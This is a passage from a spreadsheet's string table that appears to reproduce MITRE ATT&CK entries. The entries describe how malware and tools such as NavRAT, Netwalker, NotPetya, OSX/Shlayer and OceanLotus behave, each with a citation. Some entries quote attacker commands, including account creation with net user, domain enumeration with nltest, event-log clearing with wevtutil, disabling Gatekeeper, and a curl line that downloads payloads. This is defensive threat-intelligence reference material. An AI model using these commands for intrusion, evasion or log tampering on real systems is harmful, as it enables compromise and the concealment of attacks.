  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) uses the email platform, Naver, for C2 communications, leveraging SMTP.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) uses &lt;code&gt;tasklist /v&lt;/code&gt; to check running processes.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) copies itself into a running Internet Explorer process to evade detection.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) creates a Registry key to ensure a file gets executed upon reboot in order to establish persistence.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) uses &lt;code&gt;systeminfo&lt;/code&gt; on a victim’s machine.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) leverages cmd.exe to perform discovery techniques.(Citation: Talos NavRAT May 2018) [NavRAT](https://attack.mitre.org/software/S0247) loads malicious shellcode and executes it in memory.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) can use DLL side-loading to gain execution.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) has the capability to upload collected files to C2.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) has the ability to delete files and directories.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) can list files and directories on a compromised host.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) can download files from C2.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) has created a service named "Windows Update Agent1" to appear legitimate.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) uses functions named &lt;code&gt;StartUserModeBrowserInjection&lt;/code&gt; and &lt;code&gt;StopUserModeBrowserInjection&lt;/code&gt; indicating that it's trying to imitate chrome_frame_helper.dll.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) has the ability to use &lt;code&gt;CreateProcess&lt;/code&gt; to execute a process.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) can use TCP in C2 communications.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) can enumerate processes on a target system.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) can achieve persistence through a Registry Run key.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) can use RC4 and XOR to encrypt C2 communications.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) can discover logical drive information including the drive type, free space, and volume information.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) can use CMD to execute a process.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) can create a service to establish persistence.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Neoichor](https://attack.mitre.org/software/S0691) can use the Internet Explorer (IE) COM interface to connect and receive commands from C2.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Neoichor](https://attack.mitre.org/software/S0691) can upload files from a victim's machine.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Neoichor](https://attack.mitre.org/software/S0691) can clear the browser history on a compromised host by changing the `ClearBrowsingHistoryOnExit` value to 1 in the `HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy` Registry key.(Citation: Microsoft NICKEL December 2021)
</t>
  </si>
  <si>
    <t>[Neoichor](https://attack.mitre.org/software/S0691) can download additional files onto a compromised host.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Neoichor](https://attack.mitre.org/software/S0691) can check for Internet connectivity by contacting bing[.]com with the request format `bing[.]com?id=&lt;GetTickCount&gt;`.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Neoichor](https://attack.mitre.org/software/S0691) has the ability to configure browser settings by modifying Registry entries under `HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer`.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Neoichor](https://attack.mitre.org/software/S0691) can collect the OS version and computer name from a compromised host.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Neoichor](https://attack.mitre.org/software/S0691) can identify the system language on a compromised host.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Neoichor](https://attack.mitre.org/software/S0691) can gather the IP address from an infected host.(Citation: Microsoft NICKEL December 2021)  </t>
  </si>
  <si>
    <t>[Neoichor](https://attack.mitre.org/software/S0691) can collect the user name from a victim's machine.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Neoichor](https://attack.mitre.org/software/S0691) can use HTTP for C2 communications.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Nerex](https://attack.mitre.org/software/S0210) drops a signed Microsoft DLL to disk.(Citation: Symantec Nerex May 2012)</t>
  </si>
  <si>
    <t>[Nerex](https://attack.mitre.org/software/S0210) creates a backdoor through which remote attackers can download files onto a compromised host.(Citation: Symantec Ristol May 2012)</t>
  </si>
  <si>
    <t>[Nerex](https://attack.mitre.org/software/S0210) creates a Registry subkey that registers a new service.(Citation: Symantec Nerex May 2012)</t>
  </si>
  <si>
    <t>[Net](https://attack.mitre.org/software/S0039) commands used with the &lt;code&gt;/domain&lt;/code&gt; flag can be used to gather information about and manipulate user accounts on the current domain.(Citation: Microsoft Net)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net user username \password \domain&lt;/code&gt; commands in [Net](https://attack.mitre.org/software/S0039) can be used to create a domain account.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>Commands such as &lt;code&gt;net group /domain&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about and manipulate groups.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net user username \password&lt;/code&gt; commands in [Net](https://attack.mitre.org/software/S0039) can be used to create a local account.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>Commands under &lt;code&gt;net user&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about and manipulate user accounts.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>Commands such as &lt;code&gt;net group&lt;/code&gt; and &lt;code&gt;net localgroup&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about and manipulate groups.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net use \\system\share /delete&lt;/code&gt; command can be used in [Net](https://attack.mitre.org/software/S0039) to remove an established connection to a network share.(Citation: Technet Net Use)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net view \\remotesystem&lt;/code&gt; and &lt;code&gt;net share&lt;/code&gt; commands in [Net](https://attack.mitre.org/software/S0039) can be used to find shared drives and directories on remote and local systems respectively.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net accounts&lt;/code&gt; and &lt;code&gt;net accounts /domain&lt;/code&gt; commands with [Net](https://attack.mitre.org/software/S0039) can be used to obtain password policy information.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>Commands such as &lt;code&gt;net view&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about available remote systems.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>Lateral movement can be done with [Net](https://attack.mitre.org/software/S0039) through &lt;code&gt;net use&lt;/code&gt; commands to connect to the on remote systems.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net start&lt;/code&gt; and &lt;code&gt;net stop&lt;/code&gt; commands can be used in [Net](https://attack.mitre.org/software/S0039) to execute or stop Windows services.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>Commands such as &lt;code&gt;net use&lt;/code&gt; and &lt;code&gt;net session&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about network connections from a particular host.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net start&lt;/code&gt; command can be used in [Net](https://attack.mitre.org/software/S0039) to find information about Windows services.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net time&lt;/code&gt; command can be used in [Net](https://attack.mitre.org/software/S0039) to determine the local or remote system time.(Citation: TechNet Net Time)</t>
  </si>
  <si>
    <t>[Net Crawler](https://attack.mitre.org/software/S0056) uses credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) and [Windows Credential Editor](https://attack.mitre.org/software/S0005) to extract cached credentials from Windows systems.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[Net Crawler](https://attack.mitre.org/software/S0056) uses a list of known credentials gathered through credential dumping to guess passwords to accounts as it spreads throughout a network.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[Net Crawler](https://attack.mitre.org/software/S0056) uses Windows admin shares to establish authenticated sessions to remote systems over SMB as part of lateral movement.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[Net Crawler](https://attack.mitre.org/software/S0056) uses [PsExec](https://attack.mitre.org/software/S0029) to perform remote service manipulation to execute a copy of itself as part of lateral movement.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[NetTraveler](https://attack.mitre.org/software/S0033) reports window names along with keylogger information to provide application context.(Citation: Kaspersky NetTraveler)</t>
  </si>
  <si>
    <t>[NetTraveler](https://attack.mitre.org/software/S0033) contains a keylogger.(Citation: Kaspersky NetTraveler)</t>
  </si>
  <si>
    <t xml:space="preserve">[Netwalker](https://attack.mitre.org/software/S0457) can encrypt files on infected machines to extort victims.(Citation: TrendMicro Netwalker May 2020)	</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457)'s PowerShell script can decode and decrypt multiple layers of obfuscation, leading to the [Netwalker](https://attack.mitre.org/software/S0457) DLL being loaded into memory.(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can detect and terminate active security software-related processes on infected systems.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">The [Netwalker](https://attack.mitre.org/software/S0457) DLL has been injected reflectively into the memory of a legitimate running process.(Citation: TrendMicro Netwalker May 2020)	</t>
  </si>
  <si>
    <t>Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used psexec and certutil to retrieve the [Netwalker](https://attack.mitre.org/software/S0457) payload.(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can delete the infected system's Shadow Volumes to prevent recovery.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used psexec to copy the [Netwalker](https://attack.mitre.org/software/S0457) payload across accessible systems.(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can add the following registry entry: &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\{8 random characters}&lt;/code&gt;.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can use Windows API functions to inject the ransomware DLL.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457)'s PowerShell script has been obfuscated with multiple layers including base64 and hexadecimal encoding and XOR-encryption, as well as obfuscated PowerShell functions and variables. [Netwalker](https://attack.mitre.org/software/S0457)'s DLL has also been embedded within the PowerShell script in hex format.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) has been written in PowerShell and executed directly in memory, avoiding detection.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Netwalker](https://attack.mitre.org/software/S0457) can detect and terminate active security software-related processes on infected systems.(Citation: TrendMicro Netwalker May 2020)	</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can terminate system processes and services, some of which relate to backup software.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can determine the system architecture it is running on to choose which version of the DLL to use.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used batch scripts to retrieve the [Netwalker](https://attack.mitre.org/software/S0457) payload.(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Netwalker](https://attack.mitre.org/software/S0457) can use WMI to delete Shadow Volumes.(Citation: TrendMicro Netwalker May 2020)	</t>
  </si>
  <si>
    <t>[Ngrok](https://attack.mitre.org/software/S0508) can provide DGA for C2 servers through the use of random URL strings that change every 12 hours.(Citation: Zdnet Ngrok September 2018)</t>
  </si>
  <si>
    <t>[Ngrok](https://attack.mitre.org/software/S0508) has been used by threat actors to configure servers for data exfiltration.(Citation: MalwareBytes Ngrok February 2020)</t>
  </si>
  <si>
    <t>[Ngrok](https://attack.mitre.org/software/S0508) can tunnel RDP and other services securely over internet connections.(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019)(Citation: MalwareBytes Ngrok February 2020)(Citation: Trend Micro Ngrok September 2020)</t>
  </si>
  <si>
    <t>[Ngrok](https://attack.mitre.org/software/S0508) can be used to proxy connections to machines located behind NAT or firewalls.(Citation: MalwareBytes Ngrok February 2020)(Citation: Zdnet Ngrok September 2018)</t>
  </si>
  <si>
    <t>[Ngrok](https://attack.mitre.org/software/S0508) has been used by threat actors to proxy C2 connections to ngrok service subdomains.(Citation: Zdnet Ngrok September 2018)</t>
  </si>
  <si>
    <t>[Nidiran](https://attack.mitre.org/software/S0118) can download and execute files.(Citation: Symantec Backdoor.Nidiran)</t>
  </si>
  <si>
    <t>[Nidiran](https://attack.mitre.org/software/S0118) can create a new service named msamger (Microsoft Security Accounts Manager), which mimics the legitimate Microsoft database by the same name.(Citation: Symantec Backdoor.Nidiran)(Citation: Microsoft SAM)</t>
  </si>
  <si>
    <t>[Nidiran](https://attack.mitre.org/software/S0118) can create a new service named msamger (Microsoft Security Accounts Manager).(Citation: Symantec Backdoor.Nidiran)</t>
  </si>
  <si>
    <t>[Nltest](https://attack.mitre.org/software/S0359) may be used to enumerate trusted domains by using commands such as &lt;code&gt;nltest /domain_trusts&lt;/code&gt;.(Citation: Nltest Manual)(Citation: Fortinet TrickBot)</t>
  </si>
  <si>
    <t>[Nltest](https://attack.mitre.org/software/S0359) may be used to enumerate remote domain controllers using options such as &lt;code&gt;/dclist&lt;/code&gt; and &lt;code&gt;/dsgetdc&lt;/code&gt;.(Citation: Nltest Manual)</t>
  </si>
  <si>
    <t>[Nltest](https://attack.mitre.org/software/S0359) may be used to enumerate the parent domain of a local machine using &lt;code&gt;/parentdomain&lt;/code&gt;.(Citation: Nltest Manual)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) uses &lt;code&gt;wevtutil&lt;/code&gt; to clear the Windows event logs.(Citation: Talos Nyetya June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) encrypts user files and disk structures like the MBR with 2048-bit RSA.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) can use two exploits in SMBv1, EternalBlue and EternalRomance, to spread itself to other remote systems on the network.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) searches for files ending with dozens of different file extensions prior to encryption.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) contains a modified version of [Mimikatz](https://attack.mitre.org/software/S0002) to help gather credentials that are later used for lateral movement.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) can use valid credentials with [PsExec](https://attack.mitre.org/software/S0029) or &lt;code&gt;wmic&lt;/code&gt; to spread itself to remote systems.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) drops [PsExec](https://attack.mitre.org/software/S0029) with the filename dllhost.dat.(Citation: Talos Nyetya June 2017)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) uses &lt;code&gt;rundll32.exe&lt;/code&gt; to install itself on remote systems when accessed via [PsExec](https://attack.mitre.org/software/S0029) or &lt;code&gt;wmic&lt;/code&gt;.(Citation: Talos Nyetya June 2017)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) can use [PsExec](https://attack.mitre.org/software/S0029), which interacts with the &lt;code&gt;ADMIN$&lt;/code&gt; network share to execute commands on remote systems.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: PsExec Russinovich)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) creates a task to reboot the system one hour after infection.(Citation: Talos Nyetya June 2017)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) determines if specific antivirus programs are running on an infected host machine.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) can use [PsExec](https://attack.mitre.org/software/S0029) to help propagate itself across a network.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) will reboot the system one hour after infection.(Citation: Talos Nyetya June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) can use &lt;code&gt;wmic&lt;/code&gt; to help propagate itself across a network.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) collects credentials from several email clients.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) collects credentials from Internet Explorer, Mozilla Firefox, and Eudora.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) can use SMTP for C2.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) installs itself in &lt;code&gt;%ALLUSERPROFILE%\\Application Data\Microsoft\MediaPlayer\updatewindws.exe&lt;/code&gt;; the directory name is missing a space and the file name is missing the letter "o."(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) obfuscates internal strings and unpacks them at startup.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) can use HTTP for C2.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) enumerates local and domain users(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t xml:space="preserve">[OSInfo](https://attack.mitre.org/software/S0165) specifically looks for Domain Admins and power users within the domain.(Citation: Symantec Buckeye) </t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) has enumerated the local administrators group.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) discovers shares on the network(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) queries the registry to look for information about Terminal Services.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) performs a connection test to discover remote systems in the network(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) discovers information about the infected machine.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) discovers the current domain information.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) enumerates the current network connections similar to &lt;code&gt; net use &lt;/code&gt;.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can install malicious Safari browser extensions to serve ads.(Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can base64-decode and AES-decrypt downloaded payloads.(Citation: Carbon Black Shlayer Feb 2019) Versions of [OSX/Shlayer](https://attack.mitre.org/software/S0402) pass encrypted and password-protected code to &lt;code&gt;openssl&lt;/code&gt; and then write the payload to the &lt;code&gt;/tmp&lt;/code&gt; folder.(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can escalate privileges to root by asking the user for credentials.(Citation: Carbon Black Shlayer Feb 2019)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) has used the command &lt;code&gt;appDir="$(dirname $(dirname "$currentDir"))"&lt;/code&gt; and &lt;code&gt;$(dirname "$(pwd -P)")&lt;/code&gt; to construct installation paths.(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>If running with elevated privileges, [OSX/Shlayer](https://attack.mitre.org/software/S0402) has used the &lt;code&gt;spctl&lt;/code&gt; command to disable Gatekeeper protection for a downloaded file. [OSX/Shlayer](https://attack.mitre.org/software/S0402) can also leverage system links pointing to bash scripts in the downloaded DMG file to bypass Gatekeeper, a flaw patched in macOS 11.3 and later versions. [OSX/Shlayer](https://attack.mitre.org/software/S0402) has been Notarized by Apple, resulting in successful passing of additional Gatekeeper checks.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Shlayer jamf gatekeeper bypass 2021)(Citation: objectivesee osx.shlayer apple approved 2020)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) has executed a .command script from a hidden directory in a mounted DMG.(Citation: Carbon Black Shlayer Feb 2019)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) has used the &lt;code&gt;mktemp&lt;/code&gt; utility to make random and unique filenames for payloads, such as &lt;code&gt;export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"&lt;/code&gt; or &lt;code&gt;mktemp -t Installer&lt;/code&gt;.(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)(Citation: Shlayer jamf gatekeeper bypass 2021)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can download payloads, and extract bytes from files. [OSX/Shlayer](https://attack.mitre.org/software/S0402) uses the &lt;code&gt;curl -fsL "$url" &gt;$tmp_path&lt;/code&gt; command to download malicious payloads into a temporary directory.(Citation: Carbon Black Shlayer Feb 2019)(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)(Citation: objectivesee osx.shlayer apple approved 2020)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can use the &lt;code&gt;chmod&lt;/code&gt; utility to set a file as executable, such as &lt;code&gt;chmod 777&lt;/code&gt; or &lt;code&gt;chmod +x&lt;/code&gt;.(Citation: 20 macOS Common Tools and Techniques)(Citation: Carbon Black Shlayer Feb 2019)(Citation: Shlayer jamf gatekeeper bypass 2021)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) has relied on users mounting and executing a malicious DMG file.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can masquerade as a Flash Player update.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) has used a resource fork to hide a compressed binary file of itself from the terminal, Finder, and potentially evade traditional scanners.(Citation: tau bundlore erika noerenberg 2020)(Citation: sentinellabs resource named fork 2020)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) has collected the IOPlatformUUID, session UID, and the OS version using the command &lt;code&gt;sw_vers -productVersion&lt;/code&gt;.(Citation: Carbon Black Shlayer Feb 2019)(Citation: sentinelone shlayer to zshlayer)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can use bash scripts to check the macOS version, download payloads, and extract bytes from files. [OSX/Shlayer](https://attack.mitre.org/software/S0402) uses the command &lt;code&gt;sh -c tail -c +1381...&lt;/code&gt; to extract bytes at an offset from a specified file. [OSX/Shlayer](https://attack.mitre.org/software/S0402) uses the &lt;code&gt;curl -fsL "$url" &gt;$tmp_path&lt;/code&gt; command to download malicious payloads into a temporary directory.(Citation: Carbon Black Shlayer Feb 2019)(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)(Citation: objectivesee osx.shlayer apple approved 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) scrambles and encrypts data using AES256 before sending it to the C2 server.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has the ability to upload files from a compromised host.(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has a command to delete a file from the system. [OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) deletes the app bundle and dropper after execution.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses the command &lt;code&gt;xattr -d com.apple.quarantine&lt;/code&gt; to remove the quarantine file attribute used by Gatekeeper.(Citation: Trend Micro MacOS Backdoor November 2020)(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) sets the main loader file’s attributes to hidden.(Citation: TrendMicro MacOS April 2018)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has a command to download and execute a file on the victim’s machine.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can create a persistence file in the folder &lt;code&gt;/Library/LaunchAgents&lt;/code&gt;.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>If running with &lt;code&gt;root&lt;/code&gt; permissions, [OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can create a persistence file in the folder &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt;.(Citation: TrendMicro MacOS April 2018)(Citation: sentinelone apt32 macOS backdoor 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has changed permissions of a second-stage payload to an executable via &lt;code&gt;chmod&lt;/code&gt;.(Citation: sentinelone apt32 macOS backdoor 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has disguised its app bundle by adding special characters to the filename and using the icon for legitimate Word documents.(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) encrypts its strings in RSA256 and encodes them in a custom base64 scheme and XOR.(Citation: TrendMicro MacOS April 2018)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses PowerShell scripts.(Citation: TrendMicro MacOS April 2018)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has a variant that is packed with UPX.(Citation: ESET OceanLotus macOS April 2019)</t>
  </si>
  <si>
